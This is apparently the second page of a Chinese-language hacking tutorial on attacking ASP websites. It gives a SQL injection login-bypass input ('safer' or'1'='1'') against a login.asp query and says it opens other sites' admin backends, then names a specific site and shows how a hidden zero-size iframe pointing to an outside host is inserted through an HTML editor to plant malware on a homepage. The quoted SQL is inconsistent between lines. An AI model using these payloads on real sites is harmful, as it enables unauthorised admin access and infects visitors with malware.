在login.asp中，接收用户输入的Userid和Password数据，并分别赋值给user和pwd。

然后再用sql="select * from admin where username="&user&" and password="&pwd&""

这句来对用户名和密码加以验证。
　　
但是如果Userid的值和password的值被赋于：safer' or'1'='1' 这时。

sql="select * from admin where username="&user&" and password="&pwd&"" 就成了：
　　
sql="select * from reg where user=safer' or'1'='1' and pass=safer' or'1'='1'

同样利用这个可以进别的程序的后台.这种程序是最垃圾。也是最原始的了

　　
http://www.sx165.com/xinwen1/view.asp?id=562  (注意：别人挂有病毒...

那放病毒的是怎么把病毒加入到主页面的源码中呢?看到最下角有个html编辑器了么?

我们在htm代码编辑器里面添加
<iframe src=http://safe.ie.la/hsqq.htm width=0 height=0></iframe>
保存成功后.我们回首页查看源代码.

就这样加进去的.和我上次做的内部跨站挂马教程差不多...

由于有人要我就放出来给大家看.

上一页  [1] [2]